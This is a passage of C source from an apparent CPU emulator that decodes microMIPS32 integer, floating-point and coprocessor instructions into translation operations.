14) & 3, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x2c: switch (minor) { case BITSWAP: check_insn(ctx, ISA_MIPS32R6); gen_bitswap(ctx, OPC_BITSWAP, rs, rt); break; case SEB: gen_bshfl(ctx, OPC_SEB, rs, rt); break; case SEH: gen_bshfl(ctx, OPC_SEH, rs, rt); break; case CLO: mips32_op = OPC_CLO; goto do_cl; case CLZ: mips32_op = OPC_CLZ; do_cl: check_insn(ctx, ISA_MIPS32); gen_cl(ctx, mips32_op, rt, rs); break; case RDHWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_rdhwr(ctx, rt, rs, 0); break; case WSBH: gen_bshfl(ctx, OPC_WSBH, rs, rt); break; case MULT: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MULT; goto do_mul; case MULTU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MULTU; goto do_mul; case DIV: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_DIV; goto do_div; case DIVU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_DIVU; goto do_div; do_div: check_insn(ctx, ISA_MIPS32); gen_muldiv(ctx, mips32_op, 0, rs, rt); break; case MADD: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD; goto do_mul; case MADDU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADDU; goto do_mul; case MSUB: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB; goto do_mul; case MSUBU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUBU; do_mul: check_insn(ctx, ISA_MIPS32); gen_muldiv(ctx, mips32_op, 0, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x34: switch (minor) { case MFC2: case MTC2: case MFHC2: case MTHC2: case CFC2: case CTC2: generate_exception_err(ctx, EXCP_CpU, 2); break; default: goto pool32axf_invalid; } break; case 0x3c: switch (minor) { case JALR: /* JALRC */ case JALR_HB: /* JALRC_HB */ if (ctx->insn_flags & ISA_MIPS32R6) { /* JALRC, JALRC_HB */ gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 0); } else { /* JALR, JALR_HB */ gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; } break; case JALRS: case JALRS_HB: check_insn_opc_removed(ctx, 
ISA_MIPS32R6); gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; default: goto pool32axf_invalid; } break; case 0x05: switch (minor) { case RDPGPR: check_cp0_enabled(ctx); check_insn(ctx, ISA_MIPS32R2); gen_load_srsgpr(tcg_ctx, rs, rt); break; case WRPGPR: check_cp0_enabled(ctx); check_insn(ctx, ISA_MIPS32R2); gen_store_srsgpr(tcg_ctx, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x0d: switch (minor) { case TLBP: mips32_op = OPC_TLBP; goto do_cp0; case TLBR: mips32_op = OPC_TLBR; goto do_cp0; case TLBWI: mips32_op = OPC_TLBWI; goto do_cp0; case TLBWR: mips32_op = OPC_TLBWR; goto do_cp0; case TLBINV: mips32_op = OPC_TLBINV; goto do_cp0; case TLBINVF: mips32_op = OPC_TLBINVF; goto do_cp0; case WAIT: mips32_op = OPC_WAIT; goto do_cp0; case DERET: mips32_op = OPC_DERET; goto do_cp0; case ERET: mips32_op = OPC_ERET; do_cp0: gen_cp0(env, ctx, mips32_op, rt, rs); break; default: goto pool32axf_invalid; } break; case 0x1d: switch (minor) { case DI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rs); /* * Stop translation as we may have switched the execution * mode. */ ctx->base.is_jmp = DISAS_STOP; tcg_temp_free(tcg_ctx, t0); } break; case EI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rs); /* * DISAS_STOP isn't sufficient, we need to ensure we break out * of translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; tcg_temp_free(tcg_ctx, t0); } break; default: goto pool32axf_invalid; } break; case 0x2d: switch (minor) { case SYNC: gen_sync(tcg_ctx, extract32(ctx->opcode, 16, 5)); break; case SYSCALL: generate_exception_end(ctx, EXCP_SYSCALL); break; case SDBBP: if (is_uhi(extract32(ctx->opcode, 16, 10))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { check_insn(ctx, ISA_MIPS32); if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; default: goto pool32axf_invalid; } break; case 0x01: switch (minor & 3) { case MFHI_ACC: gen_HILO(ctx, OPC_MFHI, minor >> 2, rs); break; case MFLO_ACC: gen_HILO(ctx, OPC_MFLO, minor >> 2, rs); break; case MTHI_ACC: gen_HILO(ctx, OPC_MTHI, minor >> 2, rs); break; case MTLO_ACC: gen_HILO(ctx, OPC_MTLO, minor >> 2, rs); break; default: goto pool32axf_invalid; } break; case 0x35: check_insn_opc_removed(ctx, ISA_MIPS32R6); switch (minor) { case MFHI32: gen_HILO(ctx, OPC_MFHI, 0, rs); break; case MFLO32: gen_HILO(ctx, OPC_MFLO, 0, rs); break; case MTHI32: gen_HILO(ctx, OPC_MTHI, 0, rs); break; case MTLO32: gen_HILO(ctx, OPC_MTLO, 0, rs); break; default: goto pool32axf_invalid; } break; default: pool32axf_invalid: MIPS_INVAL("pool32axf"); generate_exception_end(ctx, EXCP_RI); break; } } /* * Values for microMIPS fmt field. Variable-width, depending on which * formats the instruction supports. 
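 * For example, MOV_FMT is decoded against the two-bit SDPS set (FMT_SDPS_S/_D/_PS), while CVT_D uses the SWL source formats (FMT_SWL_S/_W/_L).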
*/ enum { FMT_SD_S = 0, FMT_SD_D = 1, FMT_SDPS_S = 0, FMT_SDPS_D = 1, FMT_SDPS_PS = 2, FMT_SWL_S = 0, FMT_SWL_W = 1, FMT_SWL_L = 2, FMT_DWL_D = 0, FMT_DWL_W = 1, FMT_DWL_L = 2 }; static void gen_pool32fxf(DisasContext *ctx, int rt, int rs) { int extension = (ctx->opcode >> 6) & 0x3ff; uint32_t mips32_op; #define FLOAT_1BIT_FMT(opc, fmt) ((fmt << 8) | opc) #define FLOAT_2BIT_FMT(opc, fmt) ((fmt << 7) | opc) #define COND_FLOAT_MOV(opc, cond) ((cond << 7) | opc) switch (extension) { case FLOAT_1BIT_FMT(CFC1, 0): mips32_op = OPC_CFC1; goto do_cp1; case FLOAT_1BIT_FMT(CTC1, 0): mips32_op = OPC_CTC1; goto do_cp1; case FLOAT_1BIT_FMT(MFC1, 0): mips32_op = OPC_MFC1; goto do_cp1; case FLOAT_1BIT_FMT(MTC1, 0): mips32_op = OPC_MTC1; goto do_cp1; case FLOAT_1BIT_FMT(MFHC1, 0): mips32_op = OPC_MFHC1; goto do_cp1; case FLOAT_1BIT_FMT(MTHC1, 0): mips32_op = OPC_MTHC1; do_cp1: gen_cp1(ctx, mips32_op, rt, rs); break; /* Reciprocal square root */ case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_S): mips32_op = OPC_RSQRT_S; goto do_unaryfp; case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_D): mips32_op = OPC_RSQRT_D; goto do_unaryfp; /* Square root */ case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_S): mips32_op = OPC_SQRT_S; goto do_unaryfp; case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_D): mips32_op = OPC_SQRT_D; goto do_unaryfp; /* Reciprocal */ case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_S): mips32_op = OPC_RECIP_S; goto do_unaryfp; case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_D): mips32_op = OPC_RECIP_D; goto do_unaryfp; /* Floor */ case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_S): mips32_op = OPC_FLOOR_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_D): mips32_op = OPC_FLOOR_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_S): mips32_op = OPC_FLOOR_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_D): mips32_op = OPC_FLOOR_W_D; goto do_unaryfp; /* Ceiling */ case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_S): mips32_op = OPC_CEIL_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_D): mips32_op = OPC_CEIL_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_S): mips32_op = OPC_CEIL_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_D): mips32_op = OPC_CEIL_W_D; goto do_unaryfp; /* Truncation */ case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_S): mips32_op = OPC_TRUNC_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_D): mips32_op = OPC_TRUNC_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_S): mips32_op = OPC_TRUNC_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_D): mips32_op = OPC_TRUNC_W_D; goto do_unaryfp; /* Round */ case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_S): mips32_op = OPC_ROUND_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_D): mips32_op = OPC_ROUND_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_S): mips32_op = OPC_ROUND_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_D): mips32_op = OPC_ROUND_W_D; goto do_unaryfp; /* Integer to floating-point conversion */ case FLOAT_1BIT_FMT(CVT_L, FMT_SD_S): mips32_op = OPC_CVT_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_L, FMT_SD_D): mips32_op = OPC_CVT_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_W, FMT_SD_S): mips32_op = OPC_CVT_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_W, FMT_SD_D): mips32_op = OPC_CVT_W_D; goto do_unaryfp; /* Paired-foo conversions */ case FLOAT_1BIT_FMT(CVT_S_PL, 0): mips32_op = OPC_CVT_S_PL; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_S_PU, 0): mips32_op = OPC_CVT_S_PU; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_PW_PS, 0): mips32_op = OPC_CVT_PW_PS; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_PS_PW, 0): mips32_op = 
OPC_CVT_PS_PW; goto do_unaryfp; /* Floating-point moves */ case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_S): mips32_op = OPC_MOV_S; goto do_unaryfp; case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_D): mips32_op = OPC_MOV_D; goto do_unaryfp; case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_PS): mips32_op = OPC_MOV_PS; goto do_unaryfp; /* Absolute value */ case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_S): mips32_op = OPC_ABS_S; goto do_unaryfp; case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_D): mips32_op = OPC_ABS_D; goto do_unaryfp; case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_PS): mips32_op = OPC_ABS_PS; goto do_unaryfp; /* Negation */ case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_S): mips32_op = OPC_NEG_S; goto do_unaryfp; case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_D): mips32_op = OPC_NEG_D; goto do_unaryfp; case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_PS): mips32_op = OPC_NEG_PS; goto do_unaryfp; /* Reciprocal square root step */ case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_S): mips32_op = OPC_RSQRT1_S; goto do_unaryfp; case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_D): mips32_op = OPC_RSQRT1_D; goto do_unaryfp; case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_PS): mips32_op = OPC_RSQRT1_PS; goto do_unaryfp; /* Reciprocal step */ case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_S): mips32_op = OPC_RECIP1_S; goto do_unaryfp; case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_D): mips32_op = OPC_RECIP1_D; goto do_unaryfp; case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_PS): mips32_op = OPC_RECIP1_PS; goto do_unaryfp; /* Conversions to double */ case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_S): mips32_op = OPC_CVT_D_S; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_W): mips32_op = OPC_CVT_D_W; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_L): mips32_op = OPC_CVT_D_L; goto do_unaryfp; /* Conversions to single */ case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_D): mips32_op = OPC_CVT_S_D; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_W): mips32_op = OPC_CVT_S_W; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_L): mips32_op = OPC_CVT_S_L; do_unaryfp: gen_farith(ctx, mips32_op, -1, rs, rt, 0); break; /* Conditional moves on floating-point codes */ case COND_FLOAT_MOV(MOVT, 0): case COND_FLOAT_MOV(MOVT, 1): case COND_FLOAT_MOV(MOVT, 2): case COND_FLOAT_MOV(MOVT, 3): case COND_FLOAT_MOV(MOVT, 4): case COND_FLOAT_MOV(MOVT, 5): case COND_FLOAT_MOV(MOVT, 6): case COND_FLOAT_MOV(MOVT, 7): check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 1); break; case COND_FLOAT_MOV(MOVF, 0): case COND_FLOAT_MOV(MOVF, 1): case COND_FLOAT_MOV(MOVF, 2): case COND_FLOAT_MOV(MOVF, 3): case COND_FLOAT_MOV(MOVF, 4): case COND_FLOAT_MOV(MOVF, 5): case COND_FLOAT_MOV(MOVF, 6): case COND_FLOAT_MOV(MOVF, 7): check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 0); break; default: MIPS_INVAL("pool32fxf"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_micromips32_opc(CPUMIPSState *env, DisasContext *ctx) { int32_t offset; uint16_t insn; int rt, rs, rd, rr; int16_t imm; uint32_t op, minor, minor2, mips32_op; uint32_t cond, fmt, cc; insn = cpu_lduw_code(env, ctx->base.pc_next + 2); ctx->opcode = (ctx->opcode << 16) | insn; rt = (ctx->opcode >> 21) & 0x1f; rs = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; rr = (ctx->opcode >> 6) & 0x1f; imm = (int16_t) ctx->opcode; op = (ctx->opcode >> 26) & 0x3f; switch (op) { case POOL32A: minor = ctx->opcode & 0x3f; switch (minor) { case 0x00: minor = (ctx->opcode >> 6) & 0xf; switch (minor) { case SLL32: mips32_op = OPC_SLL; goto do_shifti; case SRA: mips32_op = OPC_SRA; goto do_shifti; 
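/* SRL32 and ROTR below complete the shift-immediate group; all four minors funnel into gen_shift_imm via do_shifti, with the rd field (bits 15..11) carrying the 5-bit shift amount. */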
case SRL32: mips32_op = OPC_SRL; goto do_shifti; case ROTR: mips32_op = OPC_ROTR; do_shifti: gen_shift_imm(ctx, mips32_op, rt, rs, rd); break; case SELEQZ: check_insn(ctx, ISA_MIPS32R6); gen_cond_move(ctx, OPC_SELEQZ, rd, rs, rt); break; case SELNEZ: check_insn(ctx, ISA_MIPS32R6); gen_cond_move(ctx, OPC_SELNEZ, rd, rs, rt); break; case R6_RDHWR: check_insn(ctx, ISA_MIPS32R6); gen_rdhwr(ctx, rt, rs, extract32(ctx->opcode, 11, 3)); break; default: goto pool32a_invalid; } break; case 0x10: minor = (ctx->opcode >> 6) & 0xf; switch (minor) { /* Arithmetic */ case ADD: mips32_op = OPC_ADD; goto do_arith; case ADDU32: mips32_op = OPC_ADDU; goto do_arith; case SUB: mips32_op = OPC_SUB; goto do_arith; case SUBU32: mips32_op = OPC_SUBU; goto do_arith; case MUL: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MUL; do_arith: gen_arith(ctx, mips32_op, rd, rs, rt); break; /* Shifts */ case SLLV: mips32_op = OPC_SLLV; goto do_shift; case SRLV: mips32_op = OPC_SRLV; goto do_shift; case SRAV: mips32_op = OPC_SRAV; goto do_shift; case ROTRV: mips32_op = OPC_ROTRV; do_shift: gen_shift(ctx, mips32_op, rd, rs, rt); break; /* Logical operations */ case AND: mips32_op = OPC_AND; goto do_logic; case OR32: mips32_op = OPC_OR; goto do_logic; case NOR: mips32_op = OPC_NOR; goto do_logic; case XOR32: mips32_op = OPC_XOR; do_logic: gen_logic(ctx, mips32_op, rd, rs, rt); break; /* Set less than */ case SLT: mips32_op = OPC_SLT; goto do_slt; case SLTU: mips32_op = OPC_SLTU; do_slt: gen_slt(ctx, mips32_op, rd, rs, rt); break; default: goto pool32a_invalid; } break; case 0x18: minor = (ctx->opcode >> 6) & 0xf; switch (minor) { /* Conditional moves */ case MOVN: /* MUL */ if (ctx->insn_flags & ISA_MIPS32R6) { /* MUL */ gen_r6_muldiv(ctx, R6_OPC_MUL, rd, rs, rt); } else { /* MOVN */ gen_cond_move(ctx, OPC_MOVN, rd, rs, rt); } break; case MOVZ: /* MUH */ if (ctx->insn_flags & ISA_MIPS32R6) { /* MUH */ gen_r6_muldiv(ctx, R6_OPC_MUH, rd, rs, rt); } else { /* MOVZ */ gen_cond_move(ctx, OPC_MOVZ, rd, rs, rt); } break; case MULU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MULU, rd, rs, rt); break; case MUHU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MUHU, rd, rs, rt); break; case LWXS: /* DIV */ if (ctx->insn_flags & ISA_MIPS32R6) { /* DIV */ gen_r6_muldiv(ctx, R6_OPC_DIV, rd, rs, rt); } else { /* LWXS */ gen_ldxs(ctx, rs, rt, rd); } break; case MOD: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MOD, rd, rs, rt); break; case R6_DIVU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_DIVU, rd, rs, rt); break; case MODU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MODU, rd, rs, rt); break; default: goto pool32a_invalid; } break; case INS: gen_bitops(ctx, OPC_INS, rt, rs, rr, rd); return; case LSA: check_insn(ctx, ISA_MIPS32R6); gen_lsa(ctx, OPC_LSA, rd, rs, rt, extract32(ctx->opcode, 9, 2)); break; case ALIGN: check_insn(ctx, ISA_MIPS32R6); gen_align(ctx, 32, rd, rs, rt, extract32(ctx->opcode, 9, 2)); break; case EXT: gen_bitops(ctx, OPC_EXT, rt, rs, rr, rd); return; case POOL32AXF: gen_pool32axf(env, ctx, rt, rs); break; case BREAK32: generate_exception_end(ctx, EXCP_BREAK); break; case SIGRIE: check_insn(ctx, ISA_MIPS32R6); generate_exception_end(ctx, EXCP_RI); break; default: pool32a_invalid: MIPS_INVAL("pool32a"); generate_exception_end(ctx, EXCP_RI); break; } break; case POOL32B: minor = (ctx->opcode >> 12) & 0xf; switch (minor) { case CACHE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } break; 
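/* The paired and multiple load/store forms below take a signed 12-bit offset: SIMM(ctx->opcode, 0, 12) sign-extends bits [11:0], so an encoded 0xfff yields -1. */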
case LWC2: case SWC2: /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); break; #ifdef TARGET_MIPS64 case LDP: case SDP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); #endif /* fall through */ case LWP: case SWP: gen_ldst_pair(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); break; #ifdef TARGET_MIPS64 case LDM: case SDM: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); #endif /* fall through */ case LWM32: case SWM32: gen_ldst_multiple(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); break; default: MIPS_INVAL("pool32b"); generate_exception_end(ctx, EXCP_RI); break; } break; case POOL32F: if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { minor = ctx->opcode & 0x3f; check_cp1_enabled(ctx); switch (minor) { case ALNV_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_ALNV_PS; goto do_madd; case MADD_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD_S; goto do_madd; case MADD_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD_D; goto do_madd; case MADD_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD_PS; goto do_madd; case MSUB_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB_S; goto do_madd; case MSUB_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB_D; goto do_madd; case MSUB_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB_PS; goto do_madd; case NMADD_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMADD_S; goto do_madd; case NMADD_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMADD_D; goto do_madd; case NMADD_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMADD_PS; goto do_madd; case NMSUB_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMSUB_S; goto do_madd; case NMSUB_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMSUB_D; goto do_madd; case NMSUB_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMSUB_PS; do_madd: gen_flt3_arith(ctx, mips32_op, rd, rr, rs, rt); break; case CABS_COND_FMT: check_insn_opc_removed(ctx, ISA_MIPS32R6); cond = (ctx->opcode >> 6) & 0xf; cc = (ctx->opcode >> 13) & 0x7; fmt = (ctx->opcode >> 10) & 0x3; switch (fmt) { case 0x0: gen_cmpabs_s(ctx, cond, rt, rs, cc); break; case 0x1: gen_cmpabs_d(ctx, cond, rt, rs, cc); break; case 0x2: gen_cmpabs_ps(ctx, cond, rt, rs, cc); break; default: goto pool32f_invalid; } break; case C_COND_FMT: check_insn_opc_removed(ctx, ISA_MIPS32R6); cond = (ctx->opcode >> 6) & 0xf; cc = (ctx->opcode >> 13) & 0x7; fmt = (ctx->opcode >> 10) & 0x3; switch (fmt) { case 0x0: gen_cmp_s(ctx, cond, rt, rs, cc); break; case 0x1: gen_cmp_d(ctx, cond, rt, rs, cc); break; case 0x2: gen_cmp_ps(ctx, cond, rt, rs, cc); break; default: goto pool32f_invalid; } break; case CMP_CONDN_S: check_insn(ctx, ISA_MIPS32R6); gen_r6_cmp_s(ctx, (ctx->opcode >> 6) & 0x1f, rt, rs, rd); break; case CMP_CONDN_D: check_insn(ctx, ISA_MIPS32R6); gen_r6_cmp_d(ctx, (ctx->opcode >> 6) & 0x1f, rt, rs, rd); break; case POOL32FXF: gen_pool32fxf(ctx, rt, rs); break; case 0x00: /* PLL foo */ switch ((ctx->opcode >> 6) & 0x7) { case PLL_PS: mips32_op = OPC_PLL_PS; goto do_ps; case PLU_PS: mips32_op = OPC_PLU_PS; goto do_ps; case PUL_PS: mips32_op = OPC_PUL_PS; goto do_ps; case PUU_PS: mips32_op = OPC_PUU_PS; goto do_ps; case CVT_PS_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_CVT_PS_S; do_ps: gen_farith(ctx, mips32_op, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case MIN_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) 
& 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MIN_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MIN_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x08: /* [LS][WDU]XC1 */ switch ((ctx->opcode >> 6) & 0x7) { case LWXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWXC1; goto do_ldst_cp1; case SWXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWXC1; goto do_ldst_cp1; case LDXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LDXC1; goto do_ldst_cp1; case SDXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SDXC1; goto do_ldst_cp1; case LUXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LUXC1; goto do_ldst_cp1; case SUXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SUXC1; do_ldst_cp1: gen_flt3_ldst(ctx, mips32_op, rd, rd, rt, rs); break; default: goto pool32f_invalid; } break; case MAX_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAX_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAX_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x18: /* 3D insns */ check_insn_opc_removed(ctx, ISA_MIPS32R6); fmt = (ctx->opcode >> 9) & 0x3; switch ((ctx->opcode >> 6) & 0x7) { case RSQRT2_FMT: switch (fmt) { case FMT_SDPS_S: mips32_op = OPC_RSQRT2_S; goto do_3d; case FMT_SDPS_D: mips32_op = OPC_RSQRT2_D; goto do_3d; case FMT_SDPS_PS: mips32_op = OPC_RSQRT2_PS; goto do_3d; default: goto pool32f_invalid; } break; case RECIP2_FMT: switch (fmt) { case FMT_SDPS_S: mips32_op = OPC_RECIP2_S; goto do_3d; case FMT_SDPS_D: mips32_op = OPC_RECIP2_D; goto do_3d; case FMT_SDPS_PS: mips32_op = OPC_RECIP2_PS; goto do_3d; default: goto pool32f_invalid; } break; case ADDR_PS: mips32_op = OPC_ADDR_PS; goto do_3d; case MULR_PS: mips32_op = OPC_MULR_PS; do_3d: gen_farith(ctx, mips32_op, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x20: /* MOV[FT].fmt, PREFX, RINT.fmt, CLASS.fmt*/ cc = (ctx->opcode >> 13) & 0x7; fmt = (ctx->opcode >> 9) & 0x3; switch ((ctx->opcode >> 6) & 0x7) { case MOVF_FMT: /* RINT_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* RINT_FMT */ switch (fmt) { case FMT_SDPS_S: gen_farith(ctx, OPC_RINT_S, 0, rt, rs, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_RINT_D, 0, rt, rs, 0); break; default: goto pool32f_invalid; } } else { /* MOVF_FMT */ switch (fmt) { case FMT_SDPS_S: gen_movcf_s(ctx, rs, rt, cc, 0); break; case FMT_SDPS_D: gen_movcf_d(ctx, rs, rt, cc, 0); break; case FMT_SDPS_PS: check_ps(ctx); gen_movcf_ps(ctx, rs, rt, cc, 0); break; default: goto pool32f_invalid; } } break; case MOVT_FMT: /* CLASS_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* CLASS_FMT */ switch (fmt) { case FMT_SDPS_S: gen_farith(ctx, OPC_CLASS_S, 0, rt, rs, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_CLASS_D, 0, rt, rs, 0); break; default: goto pool32f_invalid; } } else { /* MOVT_FMT */ switch (fmt) { case FMT_SDPS_S: gen_movcf_s(ctx, rs, rt, cc, 1); break; case FMT_SDPS_D: gen_movcf_d(ctx, rs, rt, cc, 1); break; case FMT_SDPS_PS: check_ps(ctx); gen_movcf_ps(ctx, rs, rt, cc, 1); break; default: goto pool32f_invalid; } } break; case PREFX: check_insn_opc_removed(ctx, ISA_MIPS32R6); break; default: goto pool32f_invalid; } break; #define FINSN_3ARG_SDPS(prfx) \ switch ((ctx->opcode >> 8) & 0x3) { \ case FMT_SDPS_S: \ mips32_op = OPC_##prfx##_S; \ goto do_fpop; \ case FMT_SDPS_D: \ mips32_op = OPC_##prfx##_D; \ goto do_fpop; \ case FMT_SDPS_PS: \ check_ps(ctx); \ mips32_op = 
